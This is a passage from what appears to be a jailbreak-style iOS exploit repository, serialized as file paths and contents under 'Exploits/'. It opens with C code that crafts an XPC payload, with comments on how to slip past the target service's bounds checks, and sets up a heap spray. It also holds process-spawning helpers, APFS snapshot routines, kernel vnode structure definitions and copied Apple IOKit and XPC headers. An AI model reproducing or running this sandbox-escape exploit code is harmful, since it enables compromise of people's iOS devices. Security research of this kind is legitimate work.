*(uint16_t*)(payload + 2) = 72; // len for SYMTLV_SYM_BASIC\n *(uint8_t*)(payload + 11) = 0x40; // Do not let it passes: if ( !(*(_BYTE *)(payload + 11) & 0x40) )\n *(uint16_t*)(payload + 72 + 4) = 8; // Do not let it passes: if ( *(_WORD *)(payload_ing_inner + *(uint16_t*)(payload + 2) + 4) != 8 )\n \n char *payload_inner = payload + 72 + 4;\n \n *(uint16_t*)(payload_inner + 2) = 100; // v45\n // Do not let these pass: if ( v45 & 3 )\n // if ( payload_remain_len < v45 + 4 ) //payload_remain_len: payload_size - 72 - 4\n // if ( (unsigned int)v45 <= 11 )\n // if ( v47 + 8 > v45 ) //v47: *(uint32_t*)(payload_inner + 8)\n *(uint32_t*)(payload_inner + 8) = 100 - 8; // provided EventKey max length\n *(uint32_t*)(payload_inner + 4) = 0xFFFFFFFF; // Must let it passes: if( _bittest((int*)(payload_inner + 4), 29u) )\n strcpy(payload_inner + 12, \"com.apple.symptoms.test.request-passthrough\");\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_data(msg, \"payload\", payload, payload_size);\n \n void *sprayData = NULL;\n \n if(boo){\n \n // Prepare spray data\n uint32_t sprayData_len = 0x20000;\n sprayData = malloc(sprayData_len);\n memset(sprayData, 0x0, sprayData_len);\n \n for(int i=0; i\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#import \n\n#define RAWLOG(str, args...) do { printf(\"%s\\n\", [[NSString stringWithFormat:CFSTR(str), ##args] UTF8String]); } while(false)\n//#define RAWLOG(str, args...) do { writetofile([NSString stringWithFormat:CFSTR(str), ##args]); } while(false)\n\n/*extern char *itunes_export_path;\nvoid writetofile(NSString *str){\n NSString *oldstr = [NSString stringWithContentsOfFile:[NSString stringWithUTF8String:itunes_export_path] encoding:NSUTF8StringEncoding error:nil];\n if(oldstr){\n oldstr = [oldstr stringByAppendingString:@\"\\n\"];\n oldstr = [oldstr stringByAppendingString:str];\n }\n else{\n oldstr = str;\n }\n [oldstr writeToFile:[NSString stringWithUTF8String:itunes_export_path] atomically:YES encoding:NSUTF8StringEncoding error:nil];\n}*/\n\n#define LOG(str, args...) RAWLOG(\"[*] \" str, ##args)\n\nextern char **environ;\nNSData *lastSystemOutput=nil;\n\nint runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t)) {\n pid_t pid;\n posix_spawn_file_actions_t *actions = NULL;\n posix_spawn_file_actions_t actionsStruct;\n int out_pipe[2];\n bool valid_pipe = false;\n posix_spawnattr_t *attr = NULL;\n posix_spawnattr_t attrStruct;\n \n NSMutableString *cmdstr = [NSMutableString stringWithCString:cmd encoding:NSUTF8StringEncoding];\n for (int i=1; i 0) {\n LOG(\"%s(%d): %@\", __FUNCTION__, pid, line);\n }\n lastSystemOutput = [outData copy];\n }\n if (waitpid(pid, &rv, 0) == -1) {\n LOG(\"ERROR: Waitpid failed\");\n } else {\n LOG(\"%s(%d) completed with exit status %d\", __FUNCTION__, pid, WEXITSTATUS(rv));\n }\n \n } else {\n LOG(\"%s(%d): ERROR posix_spawn failed (%d): %s\", __FUNCTION__, pid, rv, strerror(rv));\n rv <<= 8; // Put error into WEXITSTATUS\n }\n if (valid_pipe) {\n close(out_pipe[0]);\n }\n return rv;\n}\n\nint runCommand(const char *cmd, ...) {\n va_list ap, ap2;\n int argc = 1;\n \n va_start(ap, cmd);\n va_copy(ap2, ap);\n \n while (va_arg(ap, const char *) != NULL) {\n argc++;\n }\n va_end(ap);\n \n const char *argv[argc+1];\n argv[0] = cmd;\n for (int i=1; i\n#include \n#include \n#include \n#include \n#include \n#import \n#if __has_include()\n#include \n#else\n#include \ntypedef mach_port_t io_object_t;\ntypedef io_object_t io_registry_entry_t;\ntypedef char io_string_t[512];\ntypedef UInt32 IOOptionBits;\n\nextern const mach_port_t kIOMasterPortDefault;\n\nio_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path);\nCFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, IOOptionBits options);\nkern_return_t IOObjectRelease(io_object_t object );\n#endif\n#include \"libsnappy.h\"\n\nstatic char *copyBootHash(void);\n#define APPLESNAP \"com.apple.os.update-\"\n\n__attribute__((aligned(4)))\ntypedef struct val_attrs {\n uint32_t length;\n attribute_set_t returned;\n attrreference_t name_info;\n char name[MAXPATHLEN];\n} val_attrs_t;\n\nbool snapshot_check(int dirfd, const char *name)\n{\n const char **snapshots = snapshot_list(dirfd);\n if (snapshots == NULL) {\n return false;\n }\n for (const char **snapshot = snapshots; *snapshot; snapshot++) {\n if (strcmp(name, *snapshot)==0) {\n free(snapshots);\n return true;\n }\n }\n free(snapshots);\n return false;\n}\n\nconst char **snapshot_list(int dirfd)\n{\n uint64_t nameOffset = 257 * sizeof(char *);\n uint64_t snapshots_size = nameOffset + MAXPATHLEN;\n char **snapshots = (char **)calloc(snapshots_size, sizeof(char));\n struct attrlist attr_list = { 0 };\n \n if (snapshots == NULL) {\n perror(\"Unable to allocate memory for snapshot names\");\n return NULL;\n }\n \n attr_list.commonattr = ATTR_BULK_REQUIRED;\n \n val_attrs_t buf;\n bzero(&buf, sizeof(buf));\n int retcount;\n int snapidx = 0;\n while ((retcount = fs_snapshot_list(dirfd, &attr_list, &buf, sizeof(buf), 0))>0) {\n val_attrs_t *entry = &buf;\n \n int i;\n for (i=0; ireturned.commonattr & ATTR_CMN_NAME) {\n size_t size = strlen(entry->name) + 1;\n if (snapidx > 255) {\n fprintf(stderr, \"Too many snapshots to handle\\n\");\n return (const char **)snapshots;\n }\n if (nameOffset + size > snapshots_size) {\n snapshots_size += MAXPATHLEN;\n snapshots = (char **)reallocf(snapshots, snapshots_size);\n if (snapshots == NULL) {\n perror(\"Couldn't realloc snapshot buffer\");\n return NULL;\n }\n }\n snapshots[snapidx] = (char *)snapshots + nameOffset;\n nameOffset += size;\n strncpy(snapshots[snapidx], entry->name, size);\n snapidx++;\n }\n \n entry = (val_attrs_t *)((char *)entry + entry->length);\n }\n bzero(&buf, sizeof(buf));\n }\n \n if (retcount < 0) {\n perror(\"fs_snapshot_list\");\n return nil;\n }\n \n return (const char **)snapshots;\n}\n\nstatic int sha1_to_str(const unsigned char *hash, size_t hashlen, char *buf, size_t buflen)\n{\n if (buflen < (hashlen*2+1)) {\n return -1;\n }\n \n int i;\n for (i=0; i\n#import \n\ntypedef struct {\n union {\n uint64_t lck_mtx_data;\n uint64_t lck_mtx_tag;\n };\n union {\n struct {\n uint16_t lck_mtx_waiters;\n uint8_t lck_mtx_pri;\n uint8_t lck_mtx_type;\n };\n struct {\n struct _lck_mtx_ext_ *lck_mtx_ptr;\n };\n };\n} lck_mtx_t;\n\ntypedef struct vnode_resolve* vnode_resolve_t;\n\ntypedef uint32_t kauth_action_t;\nLIST_HEAD(buflists, buf);\n\nstruct vnode {\n lck_mtx_t v_lock; /* vnode mutex */\n TAILQ_ENTRY(vnode) v_freelist; /* vnode freelist */\n TAILQ_ENTRY(vnode) v_mntvnodes; /* vnodes for mount point */\n TAILQ_HEAD(, namecache) v_ncchildren; /* name cache entries that regard us as their parent */\n LIST_HEAD(, namecache) v_nclinks; /* name cache entries that name this vnode */\n vnode_t v_defer_reclaimlist; /* in case we have to defer the reclaim to avoid recursion */\n uint32_t v_listflag; /* flags protected by the vnode_list_lock (see below) */\n uint32_t v_flag; /* vnode flags (see below) */\n uint16_t v_lflag; /* vnode local and named ref flags */\n uint8_t v_iterblkflags; /* buf iterator flags */\n uint8_t v_references; /* number of times io_count has been granted */\n int32_t v_kusecount; /* count of in-kernel refs */\n int32_t v_usecount; /* reference count of users */\n int32_t v_iocount; /* iocounters */\n void * v_owner; /* act that owns the vnode */\n uint16_t v_type; /* vnode type */\n uint16_t v_tag; /* type of underlying data */\n uint32_t v_id; /* identity of vnode contents */\n union {\n struct mount *vu_mountedhere;/* ptr to mounted vfs (VDIR) */\n struct socket *vu_socket; /* unix ipc (VSOCK) */\n struct specinfo *vu_specinfo; /* device (VCHR, VBLK) */\n struct fifoinfo *vu_fifoinfo; /* fifo (VFIFO) */\n struct ubc_info *vu_ubcinfo; /* valid for (VREG) */\n } v_un;\n struct buflists v_cleanblkhd; /* clean blocklist head */\n struct buflists v_dirtyblkhd; /* dirty blocklist head */\n struct klist v_knotes; /* knotes attached to this vnode */\n /*\n * the following 4 fields are protected\n * by the name_cache_lock held in\n * excluive mode\n */\n kauth_cred_t v_cred; /* last authorized credential */\n kauth_action_t v_authorized_actions; /* current authorized actions for v_cred */\n int v_cred_timestamp; /* determine if entry is stale for MNTK_AUTH_OPAQUE */\n int v_nc_generation; /* changes when nodes are removed from the name cache */\n /*\n * back to the vnode lock for protection\n */\n int32_t v_numoutput; /* num of writes in progress */\n int32_t v_writecount; /* reference count of writers */\n const char *v_name; /* name component of the vnode */\n vnode_t v_parent; /* pointer to parent vnode */\n struct lockf *v_lockf; /* advisory lock list head */\n int (**v_op)(void *); /* vnode operations vector */\n mount_t v_mount; /* ptr to vfs we are in */\n void * v_data; /* private data for fs */\n \n struct label *v_label; /* MAC security label */\n \n //#if CONFIG_TRIGGERS\n vnode_resolve_t v_resolve; /* trigger vnode resolve info (VDIR only) */\n //#endif /* CONFIG_TRIGGERS */\n};\n\n\n" }, { "path": "Exploits/FreeTheSandbox/xpc.h", "content": "//\n// xpc.h\n// D22_final_iOS\n//\n// Created by aa on 3/23/19.\n// Copyright © 2019 aa. All rights reserved.\n//\n\n#ifndef xpc_h\n#define xpc_h\n\n\n#define XPC_DECL(name) typedef xpc_object_t name##_t\n\nextern const char *const _xpc_error_key_description;\n#define XPC_ERROR_KEY_DESCRIPTION _xpc_error_key_description\n\ntypedef void * xpc_object_t;\nXPC_DECL(xpc_connection);\ntypedef void (^xpc_handler_t)(xpc_object_t object);\n\nvoid\nxpc_connection_send_message_with_reply(xpc_connection_t connection,\n xpc_object_t message, dispatch_queue_t _Nullable replyq,\n xpc_handler_t handler);\nxpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection,\n xpc_object_t message);\nvoid\nxpc_connection_resume(xpc_connection_t connection);\nvoid\nxpc_connection_send_message(xpc_connection_t connection, xpc_object_t message);\n\npid_t\nxpc_connection_get_pid(xpc_connection_t connection);\n\nxpc_connection_t\nxpc_connection_create_mach_service(const char *name, dispatch_queue_t _Nullable targetq, uint64_t flags);\n\nxpc_object_t\nxpc_dictionary_create(const char * _Nonnull const * _Nullable keys,\n const xpc_object_t _Nullable * _Nullable values, size_t count);\nvoid\nxpc_dictionary_set_int64(xpc_object_t xdict, const char *key, int64_t value);\nvoid\nxpc_dictionary_set_uint64(xpc_object_t xdict, const char *key, uint64_t value);\nvoid\nxpc_dictionary_set_data(xpc_object_t xdict, const char *key, const void *bytes,\n size_t length);\nvoid\nxpc_dictionary_set_value(xpc_object_t xdict, const char *key,\n xpc_object_t _Nullable value);\nvoid\nxpc_dictionary_set_string(xpc_object_t xdict, const char *key,\n const char *string);\nvoid\nxpc_dictionary_set_bool(xpc_object_t xdict, const char *key, bool value);\n\nvoid\nxpc_dictionary_set_mach_send(xpc_object_t xdict, const char *key, mach_port_t port);\n\nvoid\nxpc_dictionary_set_mach_recv(xpc_object_t xdict, const char *key, mach_port_t port);\n\n\nconst char * _Nullable\nxpc_dictionary_get_string(xpc_object_t xdict, const char *key);\n\nxpc_object_t\nxpc_array_create(const xpc_object_t _Nonnull * _Nullable objects, size_t count);\nvoid\nxpc_array_append_value(xpc_object_t xarray, xpc_object_t value);\n\nxpc_object_t\nxpc_data_create(const void * _Nullable bytes, size_t length);\nvoid\nxpc_connection_cancel(xpc_connection_t connection);\n\nxpc_object_t xpc_null_create(void);\n\nvoid\nxpc_connection_resume(xpc_connection_t connection);\nchar *\nxpc_copy_description(xpc_object_t object);\n\n\n#endif /* xpc_h */\n" }, { "path": "Exploits/IOKit/IOKitKeys.h", "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.\n *\n * Common symbol definitions for IOKit.\n *\n * HISTORY\n *\n */\n\n\n#ifndef _IOKIT_IOKITKEYS_H\n#define _IOKIT_IOKITKEYS_H\n\n// properties found in the registry root\n#define kIOKitBuildVersionKey \"IOKitBuildVersion\"\n#define kIOKitDiagnosticsKey \"IOKitDiagnostics\"\n// a dictionary keyed by plane name\n#define kIORegistryPlanesKey \"IORegistryPlanes\"\n#define kIOCatalogueKey \"IOCatalogue\"\n\n// registry plane names\n#define kIOServicePlane \"IOService\"\n#define kIOPowerPlane \"IOPower\"\n#define kIODeviceTreePlane \"IODeviceTree\"\n#define kIOAudioPlane \"IOAudio\"\n#define kIOFireWirePlane \"IOFireWire\"\n#define kIOUSBPlane \"IOUSB\"\n\n// registry ID number\n#define kIORegistryEntryIDKey \"IORegistryEntryID\"\n// property name to get array of property names\n#define kIORegistryEntryPropertyKeysKey \"IORegistryEntryPropertyKeys\"\n\n// IOService class name\n#define kIOServiceClass \"IOService\"\n\n// IOResources class name\n#define kIOResourcesClass \"IOResources\"\n\n// IOService driver probing property names\n#define kIOClassKey \"IOClass\"\n#define kIOProbeScoreKey \"IOProbeScore\"\n#define kIOKitDebugKey \"IOKitDebug\"\n\n// IOService matching property names\n#define kIOProviderClassKey \"IOProviderClass\"\n#define kIONameMatchKey \"IONameMatch\"\n#define kIOPropertyMatchKey \"IOPropertyMatch\"\n#define kIOPropertyExistsMatchKey \"IOPropertyExistsMatch\"\n#define kIOPathMatchKey \"IOPathMatch\"\n#define kIOLocationMatchKey \"IOLocationMatch\"\n#define kIOParentMatchKey \"IOParentMatch\"\n#define kIOResourceMatchKey \"IOResourceMatch\"\n#define kIOResourceMatchedKey \"IOResourceMatched\"\n#define kIOMatchedServiceCountKey \"IOMatchedServiceCountMatch\"\n\n#define kIONameMatchedKey \"IONameMatched\"\n\n#define kIOMatchCategoryKey \"IOMatchCategory\"\n#define kIODefaultMatchCategoryKey \"IODefaultMatchCategory\"\n\n// IOService default user client class, for loadable user clients\n#define kIOUserClientClassKey \"IOUserClientClass\"\n\n// key to find IOMappers\n#define kIOMapperIDKey \"IOMapperID\"\n\n#define kIOUserClientCrossEndianKey \"IOUserClientCrossEndian\"\n#define kIOUserClientCrossEndianCompatibleKey \"IOUserClientCrossEndianCompatible\"\n#define kIOUserClientSharedInstanceKey \"IOUserClientSharedInstance\"\n// diagnostic string describing the creating task\n#define kIOUserClientCreatorKey \"IOUserClientCreator\"\n\n// IOService notification types\n#define kIOPublishNotification \"IOServicePublish\"\n#define kIOFirstPublishNotification \"IOServiceFirstPublish\"\n#define kIOMatchedNotification \"IOServiceMatched\"\n#define kIOFirstMatchNotification \"IOServiceFirstMatch\"\n#define kIOTerminatedNotification \"IOServiceTerminate\"\n#define kIOWillTerminateNotification \"IOServiceWillTerminate\"\n\n// IOService interest notification types\n#define kIOGeneralInterest \"IOGeneralInterest\"\n#define kIOBusyInterest \"IOBusyInterest\"\n#define kIOAppPowerStateInterest \"IOAppPowerStateInterest\"\n#define kIOPriorityPowerStateInterest \"IOPriorityPowerStateInterest\"\n\n#define kIOPlatformDeviceMessageKey \"IOPlatformDeviceMessage\"\n\n// IOService interest notification types\n#define kIOCFPlugInTypesKey \"IOCFPlugInTypes\"\n\n// properties found in services that implement command pooling\n#define kIOCommandPoolSizeKey \"IOCommandPoolSize\" // (OSNumber)\n\n// properties found in services that implement priority\n#define kIOMaximumPriorityCountKey \"IOMaximumPriorityCount\" // (OSNumber)\n\n// properties found in services that have transfer constraints\n#define kIOMaximumBlockCountReadKey \"IOMaximumBlockCountRead\" // (OSNumber)\n#define kIOMaximumBlockCountWriteKey \"IOMaximumBlockCountWrite\" // (OSNumber)\n#define kIOMaximumByteCountReadKey \"IOMaximumByteCountRead\" // (OSNumber)\n#define kIOMaximumByteCountWriteKey \"IOMaximumByteCountWrite\" // (OSNumber)\n#define kIOMaximumSegmentCountReadKey \"IOMaximumSegmentCountRead\" // (OSNumber)\n#define kIOMaximumSegmentCountWriteKey \"IOMaximumSegmentCountWrite\" // (OSNumber)\n#define kIOMaximumSegmentByteCountReadKey \"IOMaximumSegmentByteCountRead\" // (OSNumber)\n#define kIOMaximumSegmentByteCountWriteKey \"IOMaximumSegmentByteCountWrite\" // (OSNumber)\n#define kIOMinimumSegmentAlignmentByteCountKey \"IOMinimumSegmentAlignmentByteCount\" // (OSNumber)\n#define kIOMaximumSegmentAddressableBitCountKey \"IOMaximumSegmentAddressableBitCount\" // (OSNumber)\n#define kIOMinimumSaturationByteCountKey \"IOMinimumSaturationByteCount\" // (OSNumber)\n\n// properties found in services that wish to describe an icon\n//\n// IOIcon =\n// {\n// CFBundleIdentifier = \"com.example.driver.example\";\n// IOBundleResourceFile = \"example.icns\";\n// };\n//\n// where IOBundleResourceFile is the filename of the resource\n\n#define kIOIconKey \"IOIcon\" // (OSDictionary)\n#define kIOBundleResourceFileKey \"IOBundleResourceFile\" // (OSString)\n\n#define kIOBusBadgeKey \"IOBusBadge\" // (OSDictionary)\n#define kIODeviceIconKey \"IODeviceIcon\" // (OSDictionary)\n\n// property of root that describes the machine's serial number as a string\n#define kIOPlatformSerialNumberKey \"IOPlatformSerialNumber\" // (OSString)\n\n// property of root that describes the machine's UUID as a string\n#define kIOPlatformUUIDKey \"IOPlatformUUID\" // (OSString)\n\n// IODTNVRAM property keys\n#define kIONVRAMDeletePropertyKey \"IONVRAM-DELETE-PROPERTY\"\n#define kIONVRAMSyncNowPropertyKey \"IONVRAM-SYNCNOW-PROPERTY\"\n#define kIONVRAMActivateCSRConfigPropertyKey \"IONVRAM-ARMCSR-PROPERTY\"\n#define kIODTNVRAMPanicInfoKey \"aapl,panic-info\"\n\n// keys for complex boot information\n#define kIOBootDeviceKey \"IOBootDevice\" // dict | array of dicts\n#define kIOBootDevicePathKey \"IOBootDevicePath\" // arch-neutral OSString\n#define kIOBootDeviceSizeKey \"IOBootDeviceSize\" // OSNumber of bytes\n\n// keys for OS Version information\n#define kOSBuildVersionKey \"OS Build Version\"\n\n#endif /* ! _IOKIT_IOKITKEYS_H */\n" }, { "path": "Exploits/IOKit/IOKitLib.h", "content": "/*\n * Copyright (c) 1998-2014 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this\n * file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n *\n */\n\n/*\n * IOKit user library\n */\n\n#ifndef _IOKIT_IOKITLIB_H\n#define _IOKIT_IOKITLIB_H\n\n#ifdef KERNEL\n#error This file is not for kernel use\n#endif\n\n#include \n#include \n\n#include \n#include \n\n#include \n#include \n#include \n\n#include \"IOTypes.h\"\n#include \"IOKitKeys.h\"\n\n#include \"OSMessageNotification.h\"\n\n#include \n\n#include \n\n__BEGIN_DECLS\n\n/*! @header IOKitLib\n IOKitLib implements non-kernel task access to common IOKit object types - IORegistryEntry, IOService, IOIterator etc. These functions are generic - families may provide API that is more specific.
\n IOKitLib represents IOKit objects outside the kernel with the types io_object_t, io_registry_entry_t, io_service_t, & io_connect_t. Function names usually begin with the type of object they are compatible with - eg. IOObjectRelease can be used with any io_object_t. Inside the kernel, the c++ class hierarchy allows the subclasses of each object type to receive the same requests from user level clients, for example in the kernel, IOService is a subclass of IORegistryEntry, which means any of the IORegistryEntryXXX functions in IOKitLib may be used with io_service_t's as well as io_registry_t's. There are functions available to introspect the class of the kernel object which any io_object_t et al. represents.\n IOKit objects returned by all functions should be released with IOObjectRelease.\n */\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\ntypedef struct IONotificationPort * IONotificationPortRef;\n\n\n/*! @typedef IOServiceMatchingCallback\n @abstract Callback function to be notified of IOService publication.\n @param refcon The refcon passed when the notification was installed.\n @param iterator The notification iterator which now has new objects.\n */\ntypedef void\n(*IOServiceMatchingCallback)(\n void * refcon,\n io_iterator_t iterator );\n\n/*! @typedef IOServiceInterestCallback\n @abstract Callback function to be notified of changes in state of an IOService.\n @param refcon The refcon passed when the notification was installed.\n @param service The IOService whose state has changed.\n @param messageType A messageType enum, defined by IOKit/IOMessage.h or by the IOService's family.\n @param messageArgument An argument for the message, dependent on the messageType. If the message data is larger than sizeof(void*), then messageArgument contains a pointer to the message data; otherwise, messageArgument contains the message data.\n */\n\ntypedef void\n(*IOServiceInterestCallback)(\n void * refcon,\n io_service_t service,\n uint32_t messageType,\n void * messageArgument );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @const kIOMasterPortDefault\n @abstract The default mach port used to initiate communication with IOKit.\n @discussion When specifying a master port to IOKit functions, the NULL argument indicates \"use the default\". This is a synonym for NULL, if you'd rather use a named constant.\n */\n\nextern\nconst mach_port_t kIOMasterPortDefault;\n\n/*! @function IOMasterPort\n @abstract Returns the mach port used to initiate communication with IOKit.\n @discussion Functions that don't specify an existing object require the IOKit master port to be passed. This function obtains that port.\n @param bootstrapPort Pass MACH_PORT_NULL for the default.\n @param masterPort The master port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOMasterPort( mach_port_t bootstrapPort,\n mach_port_t * masterPort );\n\n\n/*! @function IONotificationPortCreate\n @abstract Creates and returns a notification object for receiving IOKit notifications of new devices or state changes.\n @discussion Creates the notification object to receive notifications from IOKit of new device arrivals or state changes. The notification object can be supply a CFRunLoopSource, or mach_port_t to be used to listen for events.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A reference to the notification object. */\n\nIONotificationPortRef\nIONotificationPortCreate(\n mach_port_t masterPort );\n\n/*! @function IONotificationPortDestroy\n @abstract Destroys a notification object created with IONotificationPortCreate.\n Also destroys any mach_port's or CFRunLoopSources obatined from\n @link IONotificationPortGetRunLoopSource @/link\n or @link IONotificationPortGetMachPort @/link\n @param notify A reference to the notification object. */\n\nvoid\nIONotificationPortDestroy(\n IONotificationPortRef notify );\n\n/*! @function IONotificationPortGetRunLoopSource\n @abstract Returns a CFRunLoopSource to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a CFRunLoop\n by adding the run loop source returned by this function to the run loop.\n \n The caller should not release this CFRunLoopSource. Just call\n @link IONotificationPortDestroy @/link to dispose of the\n IONotificationPortRef and the CFRunLoopSource when done.\n @param notify The notification object.\n @result A CFRunLoopSourceRef for the notification object. */\n\nCFRunLoopSourceRef\nIONotificationPortGetRunLoopSource(\n IONotificationPortRef notify );\n\n/*! @function IONotificationPortGetMachPort\n @abstract Returns a mach_port to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a mach messaging client\n if they listen for messages on the port obtained from this function.\n Callbacks associated with the notifications may be delivered by calling\n IODispatchCalloutFromMessage with messages received.\n \n The caller should not release this mach_port_t. Just call\n @link IONotificationPortDestroy @/link to dispose of the\n mach_port_t and IONotificationPortRef when done.\n @param notify The notification object.\n @result A mach_port for the notification object. */\n\nmach_port_t\nIONotificationPortGetMachPort(\n IONotificationPortRef notify );\n\n/*! @function IONotificationPortSetImportanceReceiver\n @abstract Configure a notification port to be an importance receiver.\n @discussion Sets the MACH_PORT_IMPORTANCE_RECEIVER attribute on the underlying mach port.\n Importance-donating messages sent to a notification port with this\n attribute enabled will boost the importance of the receiving process for the\n duration of the notification handler.\n @param notify The notification object.\n @result A kern_return_t error code. */\n\nkern_return_t\nIONotificationPortSetImportanceReceiver(\n IONotificationPortRef notify );\n\n/*! @function IONotificationPortSetDispatchQueue\n @abstract Sets a dispatch queue to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a dispatch client.\n @param notify The notification object.\n @param queue A dispatch queue. */\n\nvoid\nIONotificationPortSetDispatchQueue(\n IONotificationPortRef notify, dispatch_queue_t queue )\n__OSX_AVAILABLE_STARTING(__MAC_10_6, __IPHONE_4_3);\n\n/*! @function IODispatchCalloutFromMessage\n @abstract Dispatches callback notifications from a mach message.\n @discussion A notification object may deliver notifications to a mach messaging client,\n which should call this function to generate the callbacks associated with the notifications arriving on the port.\n @param unused Not used, set to zero.\n @param msg A pointer to the message received.\n @param reference Pass the IONotificationPortRef for the object. */\n\nvoid\nIODispatchCalloutFromMessage(\n void *unused,\n mach_msg_header_t *msg,\n void *reference );\n\n/*! @function IOCreateReceivePort\n @abstract Creates and returns a mach port suitable for receiving IOKit messages of the specified type.\n @discussion In the future IOKit may use specialized messages and ports\n instead of the standard ports created by mach_port_allocate(). Use this\n function instead of mach_port_allocate() to ensure compatibility with future\n revisions of IOKit.\n @param msgType Type of message to be sent to this port\n (kOSNotificationMessageID or kOSAsyncCompleteMessageID)\n @param recvPort The created port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOCreateReceivePort( uint32_t msgType, mach_port_t * recvPort );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOObject\n */\n\n/*! @function IOObjectRelease\n @abstract Releases an object handle previously returned by IOKitLib.\n @discussion All objects returned by IOKitLib should be released with this function when access to them is no longer needed. Using the object after it has been released may or may not return an error, depending on how many references the task has to the same object in the kernel.\n @param object The IOKit object to release.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRelease(\n io_object_t object );\n\n/*! @function IOObjectRetain\n @abstract Retains an object handle previously returned by IOKitLib.\n @discussion Gives the caller an additional reference to an existing object handle previously returned by IOKitLib.\n @param object The IOKit object to retain.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRetain(\n io_object_t object );\n\n/*! @function IOObjectGetClass\n @abstract Return the class name of an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the class the object is an instance of.\n @param object The IOKit object.\n @param className Caller allocated buffer to receive the name string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectGetClass(\n io_object_t object,\n io_name_t className );\n\n/*! @function IOObjectCopyClass\n @abstract Return the class name of an IOKit object.\n @discussion This function does the same thing as IOObjectGetClass, but returns the result as a CFStringRef.\n @param object The IOKit object.\n @result The resulting CFStringRef. This should be released by the caller. If a valid object is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopyClass(io_object_t object)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectCopySuperclassForClass\n @abstract Return the superclass name of the given class.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the superclass of the class.\n @param classname The name of the class as a CFString.\n @result The resulting CFStringRef. This should be released by the caller. If there is no superclass, or a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopySuperclassForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectCopyBundleIdentifierForClass\n @abstract Return the bundle identifier of the given class.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the kmod, which is the same as the bundle identifier.\n @param classname The name of the class as a CFString.\n @result The resulting CFStringRef. This should be released by the caller. If a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopyBundleIdentifierForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectConformsTo\n @abstract Performs an OSDynamicCast operation on an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to determine if the object will dynamic cast to a class, specified as a C-string. In other words, if the object is of that class or a subclass.\n @param object An IOKit object.\n @param className The name of the class, as a C-string.\n @result If the object handle is valid, and represents an object in the kernel that dynamic casts to the class true is returned, otherwise false. */\n\nboolean_t\nIOObjectConformsTo(\n io_object_t object,\n const io_name_t className );\n\n/*! @function IOObjectIsEqualTo\n @abstract Checks two object handles to see if they represent the same kernel object.\n @discussion If two object handles are returned by IOKitLib functions, this function will compare them to see if they represent the same kernel object.\n @param object An IOKit object.\n @param anObject Another IOKit object.\n @result If both object handles 